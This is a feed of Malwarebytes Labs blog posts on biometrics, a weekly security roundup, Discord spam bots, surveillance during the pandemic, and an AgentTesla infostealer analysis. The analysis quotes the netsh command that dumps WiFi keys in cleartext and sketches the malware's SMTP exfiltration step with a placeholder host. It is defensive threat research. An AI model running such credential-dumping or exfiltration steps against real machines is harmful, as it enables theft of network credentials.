Techie Feeds

The passwordless present: Will biometrics replace passwords forever?

Malwarebytes - Tue, 04/21/2020 - 15:00

When it comes to securing your sensitive, personally identifiable information against criminals who can engineer countless ways to snatch it from under your nose, experts have long recommended the use of strong, complex passwords. Using long passphrases with combinations of numbers, letters, and symbols that cannot be easily guessed has been the de facto security guidance for more than 20 years. But does it stand up to scrutiny?

Users typically prefer short, easy-to-remember passwords for convenience, especially since the average user maintains more than 27 online accounts that require credentials. However, such passwords have low entropy, making them easy for hackers to guess or brute force.
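To make "entropy" concrete: assuming each character is drawn uniformly at random from its symbol pool (an idealization real passwords rarely meet), the entropy in bits is simply the length times log2 of the pool size. A quick sketch in Python:

```python
import math

def estimated_entropy_bits(length: int, pool_size: int) -> float:
    """Upper-bound entropy for a password of `length` characters drawn
    uniformly at random from a pool of `pool_size` symbols."""
    return length * math.log2(pool_size)

# An 8-character all-lowercase password vs. a 16-character passphrase
# drawn from the ~94 printable ASCII characters:
weak = estimated_entropy_bits(8, 26)     # ~37.6 bits
strong = estimated_entropy_bits(16, 94)  # ~104.9 bits
```

The gap is why guidance favors long passphrases: every added character multiplies the search space, while a bigger symbol pool helps only logarithmically.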

If we factor in the consistent use of a single low-entropy password across all online accounts, despite repeated warnings, then we have a crisis on our hands—especially because remembering 27 unique, complex passwords, PIN codes, and answers to security questions is likely overwhelming for most users.

Instead of faulty and forgettable passwords, tech developers are now pushing to replace them with something that all human beings have: ourselves.

Bits of ourselves, to be exact. Dear reader, let’s talk biometrics.

Biometrics then and now

Biometrics—or the use of our unique physiological traits to identify and/or verify our identities—has been around for much longer than our computing devices. Handprints, which are found in caves that are thousands of years old, are considered one of the earliest forms of physiological biometric modality. Portuguese historian and explorer João de Barros recorded in his writings that 14th century Chinese merchants used their fingerprints to finalize transaction deals, and that Chinese parents used fingerprints and footprints to differentiate their children from one another.

Hands down, human beings are the best biometric readers—it’s innate in all of us. Studying someone’s facial features, height, weight, or notable body markings, for example, is one of the most basic and earliest means of identifying unfamiliar individuals without knowing or asking for their name. Recognizing familiar faces among a sea of strangers is a form of biometrics, as is meeting new people or determining which person out of a lineup committed a certain crime.

As the population boomed, the process of telling one human being from another became much more challenging. Listing facial features and body markings was no longer enough to accurately track individual identities at the macro level. Therefore, we developed sciences (anthropometry, from which biometrics stems), systems (the Henry Classification System), and technologies to aid us in this nascent pursuit. Biometrics didn’t really become “a thing” until the 1960s—the same era as the emergence of computer systems.

Today, many biometric modalities are in place for identification, classification, education, and, yes, data protection. These include fingerprints, voice recognition, iris scanning, and facial recognition. Many of us are familiar with these modalities and use them to access our data and devices every day. 

Are they the answer to the password problem? Let’s look at some of these biometrics modalities, where they are normally used, how widely adopted and accepted they are, and some of the security and privacy concerns surrounding them.

Fingerprint scanning/recognition

Fingerprint scanning is perhaps the most common, widely used, and accepted form of biometric modality. Historically, fingerprints—and in some cases, full handprints—were used as a means to denote ownership (as we’ve seen in cave paintings) and to prevent impersonation and the repudiation of contracts (as Sir William Herschel did when he was part of the Indian Civil Service in the 1850s).

Fingerprint and handprint samples taken by William Herschel as part of “The Beginnings of Finger-printing”

Initially, only those in law enforcement could collect and use fingerprints to identify or verify individuals. Today, billions of people around the world are carrying a fingerprint scanner as part of their smartphone devices or smart payment cards.

While fingerprint scanning is convenient, easy to use, and fairly accurate (with the exception of the elderly, as skin elasticity decreases with age), it can be circumvented—and white hat hackers have proven this time and time again.

When Apple first introduced TouchID, its then-flagship feature on the 2013 iPhone 5S, the Chaos Computer Club (CCC) from Germany bypassed it a day after its reveal. A similar incident happened in 2019, when Samsung debuted the Galaxy S10. Security researchers from Tencent even demonstrated that any fingerprint-locked smartphone can be hacked, whether it uses capacitive, optical, or ultrasonic technology.

“We hope that this finally puts to rest the illusions people have about fingerprint biometrics,” said Frank Rieger, spokesperson of the CCC, after the group defeated the TouchID. “It is plain stupid to use something that you can’t change and that you leave everywhere every day as a security token.”

Voice recognition

Otherwise known as speaker recognition or speech recognition, voice recognition is a biometric modality that, at base level, recognizes sound. However, in recognizing sound, this modality must also measure complex physiological components—the physical size, shape, and health of a person’s vocal cords, lips, teeth, tongue, and mouth cavity. In addition, voice recognition tracks behavioral components—the accent, pitch, tone, talking pace, and emotional state of the speaker, to name a few.

There are two variants of voice recognition: speaker dependent and speaker independent.

Voice recognition is used today in computer operating systems, as well as in mobile and IoT devices for command and search functionality: Siri, Alexa, and other digital assistants fit this profile. There are also software programs and apps designed around voice recognition, such as translation and transcription services, reading assistance, and educational programs.

Speaker dependent voice recognition requires training on a user’s voice: the system must become accustomed to the user’s accent and tone before it can recognize what was said. This is the type used to identify and verify user identities. Banks, tax offices, and other services have bought into the notion of using voice for customers to access their sensitive financial data. The caveat here is that only one person can use this system at a time.

Speaker independent voice recognition, on the other hand, doesn’t need training and recognizes input from multiple users; instead, it is programmed to recognize and act on certain words and phrases. Examples of speaker independent voice recognition technology are the aforementioned virtual assistants, such as Microsoft’s Cortana, and automated telephone interfaces.

But voice recognition has its downsides, too. While it has improved in accuracy by leaps and bounds over the last 10 years, there are still some issues to solve, especially for women and people of color. Like fingerprint scanning, voice recognition is also susceptible to spoofing. Alternatively, it’s easy to taint the quality of a voice recording with a poor microphone or background noise that may be difficult to avoid.

To prove that using voice to authenticate account access is an insufficient method, researchers from Salesforce broke voice authentication at Black Hat 2018 using machine learning and voice synthesis, a technology that can create lifelike human voices. They also found that the synthesized voice’s quality only needed to be good enough to do the trick.

“In our case, we only focused on using text-to-speech to bypass voice authentication. So, we really do not care about the quality of our audio,” said John Seymour, one of the researchers. “It could sound like garbage to a human as long as it bypasses the speech APIs.”

All this, and we haven’t even talked about voice deepfakes yet. Imagine fraudsters posing as anyone they want using artificial intelligence and a five-second recording of a victim’s voice. As applicable as voice recognition is as a technology, it’s perhaps the weakest form of biometric identity verification.

Iris scanning or iris recognition

Advocates of iris scanning claim it is quicker and more reliable than fingerprint scanning as a means of identification, as irises are less likely to be altered or obscured than fingerprints.

Sample iris pattern image. The bit stream (top left) was extracted based on this particular eye’s lines and colors. This is then used to compare with other patterns in a database.

Iris scanning is usually conducted with an invisible infrared light that passes over the iris, whose unique patterns and colors are read, analyzed, and digitized for comparison against a database of stored iris templates, either for identification or verification.
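In Daugman-style systems, which underpin most commercial iris recognition, that comparison boils down to the normalized Hamming distance between two bit codes. A toy sketch (the codes and threshold below are invented for illustration; real iris codes run to roughly 2,048 bits):

```python
def hamming_distance(code_a: list, code_b: list) -> float:
    """Fraction of bits that differ between two equal-length iris codes."""
    assert len(code_a) == len(code_b)
    diff = sum(a != b for a, b in zip(code_a, code_b))
    return diff / len(code_a)

# Toy 8-bit codes standing in for full-length iris templates.
enrolled = [1, 0, 1, 1, 0, 0, 1, 0]
probe    = [1, 0, 1, 0, 0, 0, 1, 0]

# Deployments accept a match below some distance threshold; ~0.32 appears
# in Daugman's published work, and is used here purely as an example.
is_match = hamming_distance(enrolled, probe) < 0.32
```

The appeal of the scheme is that matching is a cheap bit-level operation, which is what makes searching large template databases fast.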

Unlike fingerprint scanning, which requires a finger to be pressed against a reader, iris scanning can be done both within close range and from afar, as well as standing still and on-the-move. These capabilities raise significant privacy concerns, as individuals and groups of people can be surreptitiously scanned and captured without their knowledge or consent.

There’s an element of security concern with iris scanning as well: Third parties normally store these templates, and we have no idea how iris templates—or any biometric templates, for that matter—are stored, secured, and shared. Furthermore, scanning the irises of children under 4 years old generally produces scans of inferior quality compared to those of adults.

Iris scanners, especially those that market themselves as airtight or unhackable, haven’t escaped cybercriminals’ radar. In fact, such claims often fuel their motivation to prove the technology wrong. In 2019, eyeDisk, the purported “unhackable USB flash drive,” was hacked by white hat hackers at PenTest Partners. After making a splash breaking Apple’s TouchID in 2013, the CCC hacked Samsung’s “ultra secure” iris scanner for the Galaxy S8 four years later.

“The security risk to the user from iris recognition is even bigger than with fingerprints as we expose our irises a lot,” said Dirk Engling, a CCC spokesperson. “Under some circumstances, a high-resolution picture from the Internet is sufficient to capture an iris.”

Facial recognition

This biometric modality has been all the rage over the last five years. Facial recognition systems analyze images or video of the human face by mapping its features and comparing them against a database of known faces. Facial recognition can be used to grant access to accounts and devices that are typically locked by other means, such as a PIN, password, or other form of biometric. It can be used to tag photos on social media or optimize image search results. And it’s often used in surveillance, whether to prevent retail crime or help police officers identify criminals.

As with iris scanners, a concern of security and privacy advocates is the ability of facial recognition technology to be used in combination with public (or hidden) cameras that don’t require knowledge or consent from users. Combine this with lack of federal regulation, and you once again have an example of technology that has raced far ahead of our ability to define its ethical use. Accuracy is another point of contention, and multiple studies have backed up its imprecision, especially when identifying people of color.

Private corporations, such as Apple, Google, and Facebook have developed facial recognition technology for identification and authentication purposes, while governments and law enforcement implement it in surveillance programs. However, citizens—the target of this technology—have both tentatively embraced facial recognition as a password replacement and rallied against its Big Brother application via government monitoring.

When talking about the use of facial recognition technology for government surveillance, China is perhaps the top country that comes to mind. To date, China has at least 170 million CCTV cameras—a number expected to nearly triple by 2021.

With this biometric modality being used at universities, shopping malls, and even public toilets (to prevent people from taking too many tissues), surveys show Chinese citizens are wary of the data being collected. Meanwhile, the facial recognition industry in China has been the target of US sanctions for violations of human rights.

China is one of the top five countries named in the “State Enemies of the Internet” list, which was published by Reporters Without Borders in 2013.

“AI and facial recognition technology are only growing and they can be powerful and helpful tools when used correctly, but can also cause harm with privacy and security issues,” wrote Nicole Martin in Forbes. “Lawmakers will have to balance this and determine when and how facial technology will be utilized and monitor the use, or in some cases abuse, of the technology.”

Behavioral biometrics

Otherwise known as behaviometrics, this modality involves the reading of measurable behavioral patterns for the purpose of recognizing or verifying a person’s identity. Unlike other biometrics mentioned in this article, which are measured in a quick, one-time scan (static biometrics), behavioral biometrics is built around continuous monitoring and verification of traits and micro-habits.

Gait recognition, or gait analysis, is a popular example of behavioral biometrics.

This could mean, for example, that from the time you open your banking app to the time you have finished using it, your identity has been checked and re-checked multiple times, ensuring your bank that you still are who you claim you are for the entire time. The bonus? The process is frictionless, so users don’t realize the analysis is happening in the background.
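To give a feel for how such continuous checks might work, here is a deliberately simplified sketch built on one behavioral signal, keystroke timing; the enrollment data and tolerance are invented for illustration and bear no relation to any production system:

```python
from statistics import mean, stdev

def matches_profile(enrolled_ms: list, session_ms: list,
                    tolerance: float = 2.0) -> bool:
    """True if the session's mean inter-key interval lies within
    `tolerance` standard deviations of the enrolled profile's mean."""
    mu, sigma = mean(enrolled_ms), stdev(enrolled_ms)
    return abs(mean(session_ms) - mu) <= tolerance * sigma

# Enrolled typing rhythm: milliseconds between keystrokes (fabricated).
profile = [110.0, 95.0, 120.0, 105.0, 98.0, 112.0]

legit = [108.0, 101.0, 115.0]     # similar rhythm to the enrolled user
impostor = [260.0, 240.0, 255.0]  # a much slower typist
```

A real system would fuse many such signals (mouse movement, swipe pressure, navigation habits) and re-score them continuously, but the principle is the same: compare live behavior against an enrolled statistical profile.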

Private institutions have taken notice of behavioral biometrics—and the technology and systems behind this modality—because it offers a multitude of benefits. It can be tailored according to an organization’s needs. It’s efficient and can produce results in real time. And it’s secure, since biometric data of this kind is difficult to steal or replicate. The data retrieved from users is also highly accurate.

Like any other biometric modality, using behavioral biometrics brings up privacy concerns. However, the data collected by a behavioral biometric application is already being collected by device or network operators, which is recognized by standard privacy laws. Another plus for privacy advocates: Behavioral data is not defined as personally identifiable, although it’s being considered for regulation so that users are not targeted by advertisers.

While voice recognition (which we mentioned above), keystroke dynamics, and signature analysis all fall under the umbrella of behavioral biometrics, take note that organizations that employ a behavioral biometric scheme do not necessarily use these modalities.

Biometrics vs. passwords

At face value, any of the biometric modalities available today might appear to be superior to passwords. After all, one could argue that it’s easy for numeric and alphanumeric passwords to be stolen or hacked. Just look at the number of corporate breaches and millions of affected users bombarded by scams, phishing campaigns, and identity theft. Meanwhile, theft of biometric data has not yet happened at this scale (to our knowledge).

While this argument may have some merit, remember that when a password is compromised, it can be easily replaced with another password, ideally one with higher entropy. However, if biometric data is stolen, it’s impossible for a person to change it. This is, perhaps, the top argument against using biometrics.

Because a number of our physiological traits can be publicly observed, recorded, scanned from afar, or readily taken as we leave them everywhere (fingerprints), it is argued that consumer-grade biometrics—without another form of authentication—are no more secure than passwords.

Not only that, but the likelihood of cybercriminals using such data to steal someone’s identity or commit fraud will increase significantly over time. Biometric data may not (yet) open new banking accounts under your name, but it can be abused to gain access to devices and establishments that have a record of your biometric. Thanks to new “couch-to-plane” schemes several airports are beginning to adopt, stolen biometrics could put a fraudster on a plane to any destination they wish.

What about DNA as passwords?

Using one’s DNA as a password is a concept that is far from far-fetched, although not widely known or used in practice. In a recent paper, authors Madhusudhan R and Shashidhara R proposed a DNA-based authentication scheme for mobile environments using a Hyper Elliptic Curve Cryptosystem (HECC), allowing for greater security when exchanging information over a radio link. This is not only practical but can also be implemented on resource-constrained mobile devices, the authors say.

This may sound good on paper, but as the idea is still purely theoretical, privacy-conscious users will likely need a lot more convincing before using their own DNA for verification purposes. While DNA may seem like a cool and complicated way to secure our sensitive information, much like our fingerprints, we leave DNA behind all the time. And, just as we can’t change our fingerprints, our DNA is permanent. Once stolen, we can never use it for verification again.

Furthermore, the once promising idea of handing over your DNA to be stored in a giant database in exchange for learning your family’s long-forgotten secrets seems to have lost its charm. This is due to increased awareness among users of the privacy concerns surrounding commercial DNA testing, including how the companies behind them have been known to hand over data to pharmaceutical companies, marketers, and law enforcement. Not to mention, studies have shown that such test results are inaccurate about 40 percent of the time.

With so many concerns, perhaps it’s best to leave behind the notion of using DNA as your proverbial keys to the kingdom and instead focus on improving how you create, use, and store passwords.

Passwords (for now) are here to stay

As we have seen, biometrics isn’t the end-all, be-all most of us expected. However, this doesn’t mean biometrics cannot be used to secure what you hold dear. When we do use them, they should be part of a multi-factor authentication scheme—not a password replacement.

What does that look like in practice? For top-level security that solves the problem of remembering so many complex passwords, store your account credentials in a password manager. Create a long, complex passphrase as the master password. Then use multi-factor authentication to verify it: this might involve sending a passcode to a second device or email address to be entered into the password manager. Or, if you’re an organization willing to invest in biometrics, use a modality such as voice recognition to speak an authentication phrase.
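That passcode step is typically TOTP (RFC 6238), the scheme behind most authenticator apps; as a sketch of how little machinery it needs, here is a standard-library-only Python implementation, checked against the RFC’s published test vector:

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, unix_time: int = None,
         step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password (HMAC-SHA1 variant)."""
    if unix_time is None:
        unix_time = int(time.time())
    counter = struct.pack(">Q", unix_time // step)       # 64-bit time step
    digest = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: this secret at T=59 yields "94287082" (8 digits).
assert totp(b"12345678901234567890", unix_time=59, digits=8) == "94287082"
```

Because both sides derive the code from a shared secret and the current time, the passcode expires within seconds, which is exactly the property a static password lacks.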

So, are biometrics here to stay? Definitely. But so are passwords.

The post The passwordless present: Will biometrics replace passwords forever? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 13 – 19)

Malwarebytes - Mon, 04/20/2020 - 16:36

Last week on Malwarebytes Labs, we looked at how to avoid Zoom bombing, weighed the risks of surveillance versus pandemics, and dug into a spot of WiFi credential theft.

Other cybersecurity news:
  • Malware creeps back into the home: With a pandemic forcing much of the workforce into remote positions, it’s worth noting that a study found malware on 45 percent of home office networks. (Source: TechTarget)
  • Free shopping scam: Coronavirus fraudsters attempt to cash in on people’s fears with fake free offers at Tesco. (Source: Lincolnshire Live)
  • Browser danger: Researchers tackle a fake browser extension campaign that targets users of Ledger and other plugins. (Source: MyCrypto/PhishFort)
  • Phishing for cash: Research shows how phish kit selling is a profitable business. (Source: Help Net Security)
  • Big problem, big bucks: The FTC thinks Americans have lost out to the tune of 13 million dollars thanks to coronavirus scams. (Source: The Register)
  • Facebook tackles bots: A walled off simulation has been created to dig deep into the world of scams and trolls. (Source: The Verge)
  • Apple of my eye: Apple remains the top brand for phishing scammers to target. (Source: CISO Mag)
  • Fake Valorant beta keys: Reports have surfaced of fake tools promising access to upcoming game Valorant’s beta, with horribly predictable results. (Source: CyberScoop)

Stay safe, everyone!

The post A week in security (April 13 – 19) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Discord users tempted by bots offering “free Nitro games”

Malwarebytes - Fri, 04/17/2020 - 18:28

The last few weeks have seen multiple instances of problematic bots appearing in Discord channels. They bring tidings of gifts, but the reality is quite a bit different. Given so many more young kids and teens are at home during the current global lockdown, they may well see this scam bouncing around their chat channels. Worried parents may want to point them in this direction to learn about the warning signs.

What is Discord?

Sorry, teens who’ve been pointed in this direction: You can skip this part. For anyone else who needs it, Discord is a mostly gaming-themed communication platform incorporating text, voice, and video. It’s not to be mixed up with Twitch, which is more geared toward live gaming streams, e-sports competitions, and older recordings of big events.

DIY bots: part of the ecosystem

One of the most interesting features of Discord is how anyone can make their own channel bot. Simply bolt one together, keep the authorization token safe, and invite it into your channel. If you run into a bot you like the look of in someone else’s channel, you can usually invite them back into your own (or somewhere else), but you’ll need to have “manage server permissions” on your account.

You have to do a little due diligence, as things can go wrong if you don’t keep your bot and account locked down. Additionally, the very openness available to build your own bot means people can pretty much make what they like. It’s up to you as a responsible Discord user to keep that in mind before inviting all and sundry into the channel. Not all bots have the best of intentions, as we’re about to find out.

Discord in bot land

If you’re minding your business in Discord, you could be sent a direct message similar to the one above. It looks official, calls itself “Twitch,” and goes on to say the following:

Exclusive partnership

We are super happy to announce that Discord has partnered with Twitch to show some love to our super great users! From April 05, 2020 until April 15, 2020 all our users will have access to Nitro Games

You have to invite me to your servers

If there’s one thing people can appreciate in the middle of a global pandemic, it’s freebies. Clicking the blue text will pop open an invite notification:


Add bot to: [server selection goes here]

This requires you to have manage server permissions in this server.

It then goes on to give some stats about whatever bot you’re trying to invite. The one above has been active since April 13, 2019, and is used across 1,000 servers so it’s got a fair bit of visibility. As per the above notification, “This application cannot read your messages or send messages as you.”

Sounds good, right? Except there are some holes in the free Nitro games story.

Nitro is a real premium service from Discord that offers a variety of tools and functions for users. The problem is that the games offered by Nitro were shut down last October due to lack of use. What, exactly, then, is being invited into servers?

Spam as a service

Multiple Discord users have reported these bots in the last few days, mostly in relation to spam, nude pic channels, and the occasional potentially dubious download sitting on free file hosting websites. A few folks have mentioned phishing, though we’ve seen no direct links to actual phishes taking place at time of writing.

Another Discord user mentioned that, if given access, the bot will (among other things) ban everyone from the server and delete all channels. But considering the aim of the game here is to spam links and draw additional people in, this would seem counterproductive to the main goal of increasing traffic in specific servers.

Examples: Gaming spam

Here’s one server offered up as a link from one of the bots as reported by a user on Twitter:

This claims to be an accounts center for the soon-to-be-smash-hit game Valorant, currently in closed Beta. The server owner explains they’d rather give accounts away than sell them to grow their channel, which is consistent with the bots we’ve seen spreading links rather than destroying channels. While they object to “botted invites,” claiming they’ll ban anyone shown to be inviting via bots, they’re also happy to suggest spamming links to grow their channel numbers.

It’s probably a good idea they’re not selling accounts, because Riot take a dim view of selling; having said that, promoting giveaway Discords doesn’t seem too popular either.

Examples: Discord goes XXX

Before we can stop and ponder our Valorant account invite frenzy, a new private message has arrived from a second bot. It looks the same as the last bogus Nitro invite, but with a specific addition:

You’ve been invited to join a server: JOIN = FREE DISCORD NITRO AND NUDES

Nudes? Well, that’s a twist.

This is a particularly busy location, with no fewer than 15,522 members and roughly 3,000 people online. The setup is quite locked down: There’s no content available unless you work for it, by virtue of sending invites to as many people as possible.

The Read Me essentially says little beyond “Invite people to get nudes.”

Elsewhere it promotes a “nudes” Twitter profile, with the promise of videos for retweets. The account, in keeping with the general sense of lockdown, has no nudity on it.

As you can guess, these bots are persistent. Simply lingering in a server can result in a procession of invites to your account.

We were sent to a variety of locations during testing, including some that could have been about films and television, pornography, or both. In most cases it was hard to say, as almost every place we landed locked its content down.

This makes sense for the people running these channels: If everyone was open from the get-go, there’d be no desire from the people visiting to go spamming links in the dash to get some freebies.

Bots on parade

We didn’t see a single place linked from any of these bots that mentioned free Discord Nitro—it’s abandoned entirely upon entry. Visitors probably have no reason to question otherwise, and so will go off to do their free promotional duties. Again, while it’s entirely possible bots out there are wiping out people’s communities, during testing all we saw in relation to the supposed Nitro spam bots was a method for channel promotion.

If you have server permissions, you should think carefully about which bots you allow into your server. There are no free games, but there is a whole lot of spam on the horizon if you’re not paying attention.

The post Discord users tempted by bots offering “free Nitro games” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New AgentTesla variant steals WiFi credentials

Malwarebytes - Thu, 04/16/2020 - 15:55

AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. The actor behind this malware is constantly maintaining it by adding new modules. One of the new modules that has been added to this malware is the capability to steal WiFi profiles.

AgentTesla was first seen in 2014, and has been frequently used by cybercriminals in various malicious campaigns since. During the months of March and April 2020, it was actively distributed through spam campaigns in different formats, such as ZIP, CAB, MSI, IMG files, and Office documents.

Newer variants of AgentTesla seen in the wild have the capability to collect information about a victim’s WiFi profile, possibly to use it as a way to spread onto other machines. In this blog, we review how this new feature works.

Technical analysis

The variant we analyzed was written in .Net. It has an executable embedded as an image resource, which is extracted and executed at run-time (Figure 1).

Figure 1. Extract and execute the payload.

This executable (ReZer0V2) also has a resource that is encrypted. After doing several anti-debugging, anti-sandboxing, and anti-virtualization checks, the executable decrypts and injects the content of the resource into itself (Figure 2).

Figure 2. Decrypt and execute the payload.

The second payload (owEKjMRYkIfjPazjphIDdRoPePVNoulgd) is the main component of AgentTesla that steals credentials from browsers, FTP clients, wireless profiles, and more (Figure 3). The sample is heavily obfuscated to make the analysis more difficult for researchers.

Figure 3. Second payload

To collect wireless profile credentials, a new “netsh” process is created with “wlan show profile” passed as an argument (Figure 4). Available WiFi names are then extracted by applying the regex “All User Profile * :  (?<profile>.*)” to the process’s stdout.

Figure 4. Creating netsh process

In the next step, for each wireless profile, the following command is executed to extract the profile’s credentials: “netsh wlan show profile PROFILENAME key=clear” (Figure 5).
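To illustrate the extraction logic, here is a defender-side re-creation in Python (the malware itself is .NET; the netsh output below is fabricated, and Python’s (?P<...>) named-group syntax stands in for .NET’s (?<...>)):

```python
import re

# Fabricated stdout from `netsh wlan show profiles`, for illustration only.
NETSH_OUTPUT = """\
Profiles on interface Wi-Fi:

User profiles
-------------
    All User Profile     : HomeNetwork
    All User Profile     : CoffeeShop
"""

def extract_profiles(stdout: str) -> list:
    """Pull WiFi profile names the same way the malware does:
    a regex applied to the output of the netsh profile listing."""
    pattern = re.compile(r"All User Profile\s*:\s*(?P<profile>.+)")
    return [m.group("profile").strip() for m in pattern.finditer(stdout)]

profiles = extract_profiles(NETSH_OUTPUT)
# Each recovered name would then be fed into the per-profile command
# described above to dump its key in cleartext.
```

Nothing here is exotic: the stealer simply shells out to a built-in Windows tool and scrapes its human-readable output.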

Figure 5. Extract WiFi credentials

String encryption

All the strings used by the malware are encrypted; they are decrypted with the Rijndael symmetric encryption algorithm in the “<Module>.\u200E” function. This function receives a number as input and generates three byte arrays containing the input to be decrypted, the key, and the IV (Figure 6).

Figure 6. \u200E function snippet

For example, in Figure 5, “119216” is decrypted into “wlan show profile name=” and “119196” is decrypted into “key=clear”.

In addition to WiFi profiles, the executable collects extensive information about the system, including FTP clients, browsers, file downloaders, and machine info (username, computer name, OS name, CPU architecture, RAM) and adds them to a list (Figure 7).

Figure 7. List of collected info

The collected information forms the body of an SMTP message in HTML format (Figure 8):

Figure 8. Collected data in HTML format in the message body

Note: If the final list has fewer than three elements, the malware won’t generate an SMTP message. If everything checks out, a message is finally sent via smtp.yandex.com, with SSL enabled (Figure 9):

Figure 9. Building the SMTP message
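The exfiltration channel itself is just standard SMTP. A benign Python sketch of how such an HTML-bodied message is assembled; the addresses and server are placeholders, and the send step is shown only as a comment:

```python
from email.message import EmailMessage

def build_report(html_body: str) -> EmailMessage:
    """Assemble an HTML-bodied message of the kind AgentTesla exfiltrates."""
    msg = EmailMessage()
    msg["From"] = "collector@example.com"   # placeholder account
    msg["To"] = "dropbox@example.com"       # placeholder account
    msg["Subject"] = "report"
    msg.set_content(html_body, subtype="html")
    return msg

msg = build_report("<html><body><table>...</table></body></html>")

# Sending would use SSL-enabled SMTP, along the lines of:
#   import smtplib
#   with smtplib.SMTP_SSL("smtp.example.com", 465) as server:
#       server.login("collector@example.com", "password")
#       server.send_message(msg)
```

Using an ordinary mail provider over SSL helps the traffic blend in with legitimate email, which is part of why SMTP remains a popular exfiltration channel.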

The following diagram shows the whole process explained above, from extraction of the first payload from the image resource to exfiltration of the stolen information over SMTP:

Figure 10. Process diagram

Popular stealer looking to expand

Since AgentTesla added the WiFi-stealing feature, we believe the threat actors may be considering using WiFi as a mechanism for spread, similar to what was observed with Emotet. Another possibility is using the WiFi profile to set the stage for future attacks.

Either way, Malwarebytes users were already protected from this new variant of AgentTesla through our real-time protection technology.

Indicators of compromise

AgentTesla samples:

91b711812867b39537a2cd81bb1ab10315ac321a1c68e316bf4fa84badbc09b
dd4a43b0b8a68db65b00fad99519539e2a05a3892f03b869d58ee15fdf5aa044
27939b70928b285655c863fa26efded96bface9db46f35ba39d2a1295424c07b

First payload:

249a503263717051d62a6d65a5040cf408517dd22f9021e5f8978a819b18063b

Second payload: 

63393b114ebe2e18d888d982c5ee11563a193d9da3083d84a611384bc748b1b0

The post New AgentTesla variant steals WiFi credentials appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mass surveillance alone will not save us from coronavirus

Malwarebytes - Wed, 04/15/2020 - 18:05

As the pattern-shattering truth of our new lives drains heavy—as coronavirus rends routines, raids our wellbeing, and whiplashes us between anxiety and fear—we should not look to mass digital surveillance to bring us back to normal.

Already, governments have cast vast digital nets. South Koreans are tracked through GPS location history, credit card transactions, and surveillance camera footage. Israelis learned last month that their mobile device locations were surreptitiously collected for years. Now, the government rummages through this enormous database in broad daylight, this time to track the spread of COVID-19. Russians cannot leave home in some regions without scanning QR codes that restrict their time spent outside—three hours for grocery shopping, one hour to walk the dog, half that to take out the trash.

Privacy advocates around the world have sounded the alarm. This month, more than 100 civil and digital rights organizations urged that any government’s coronavirus-targeted surveillance mechanisms respect human rights. The groups, which included Privacy International, Human Rights Watch, Open Rights Group, and the Chilean nonprofit Derechos Digitales, wrote in a joint letter:

“Technology can and should play an important role during this effort to save lives, such as to spread public health messages and increase access to health care. However, an increase in state digital surveillance powers, such as obtaining access to mobile phone location data, threatens privacy, freedom of expression and freedom of association, in ways that could violate rights and degrade trust in public authorities – undermining the effectiveness of any public health response.”

The groups are right to worry.

Particularly in the United States, our country’s history of emergency-enabled surveillance has failed to respect Americans’ right to privacy and to provide measurable, increased security. Not only did rapid surveillance authorization in the US permit the collection of, at one point in time, nearly every American’s call detail records, it also created an unwieldy government program that two decades later became ineffective, economically costly, and repeatedly noncompliant with the law.

Further, some of the current technology tracking proposals—including Apple and Google’s newly announced Bluetooth capabilities—either lack evidence of effectiveness or require a degree of mass adoption that no country has proven possible. Other private proposals come from untrusted actors, too.

Finally, tech-focused solutions alone cannot fill severe physical gaps, including a lack of personal protective equipment for medical professionals, non-existent universal testing, and a potentially fatal shortage of intensive care unit beds in a country-wide outbreak.

We understand how today feels. In less than one month, the world has emptied. Churches, classrooms, theaters, and restaurants lay vacant, sometimes shuttered by wooden planks fastened over doorways. We grieve the loss of family and friends, of 17 million American jobs and the healthcare benefits they provided, of national, in-person support networks displaced into cyberspace, where the type of vulnerability meant for a physical room is now thrust online.

For a seemingly endless time at home, we curl and wait, emptied all the same.

But mass, digital surveillance alone will not make us whole.

Governments expand surveillance to track coronavirus

First detected in late 2019 in the Hubei province of China, COVID-19 has now spread across every continent except Antarctica.

To limit the spread of the virus and to keep healthcare systems from being overburdened, governments imposed a variety of physical restrictions. California closed all non-essential businesses, Ireland restricted outdoor exercise to within 1.2 miles of the home, El Salvador placed 30-day quarantines on Salvadorans entering the country from abroad, and Tunisia imposed a nightly 6:00 p.m. – 6:00 a.m. curfew.

A handful of governments took digital action, vacuuming up citizens’ cell phone data, sometimes including their rough location history.  

Last month, Israel unbuttoned a once-secret surveillance program, allowing it to reach into Israelis’ mobile phones not to provide counter-terrorism measures—as previously reserved—but to track the spread of COVID-19. The government plans to use cell phone location data that it had been privately collecting from telecommunications providers to send text messages to device owners who potentially come into contact with known coronavirus carriers. According to The New York Times, the parliamentary subcommittee meant to approve the program’s loosened restrictions never actually voted.

The Lombardy region of Italy—which, until recently, suffered the largest coronavirus swell outside of China—is working with a major telecommunications company to analyze reportedly anonymized cell phone location data to understand whether physical lockdown measures are proving effective at fighting the virus. The Austrian government is doing the same. Similarly, the Pakistani government is relying on provider-supplied location information to send targeted SMS messages to anyone who has come into close, physical contact with confirmed coronavirus patients. The program can only be as effective as it is large, requiring data on massive swaths of the country’s population.

In Singapore, the country’s government publishes grossly detailed information about coronavirus patients on its Ministry of Health public website. Ages, workplaces, workplace addresses, travel history, hospital locations, and residential streets can all be found with a simple click.

Singapore’s coronavirus detection strategy also included a separate, key component.

Last month, the government rolled out a new, voluntary mobile app for citizens to download called TraceTogether. The app relies on Bluetooth signals to detect when a confirmed coronavirus patient comes into close physical proximity with device owners using the same app. It is essentially a high-tech approach to the low-tech detective work of “contact tracing,” in which medical experts interview those with infectious illnesses and determine who they spoke to, what locations they visited, and what activities they engaged in for several days before presenting symptoms.

These examples of increased government surveillance and tracking are far from exceptional.

According to a Privacy International analysis, at least 23 countries have deployed some form of telecommunications tracking to limit the spread of coronavirus, while 14 countries are developing or have already developed their own mobile apps, including Brazil and Iceland, along with Germany and Croatia, which are both trying to make apps that are GDPR-compliant.

While some countries have relied on telecommunications providers to supply data, others are working with far more questionable private actors.

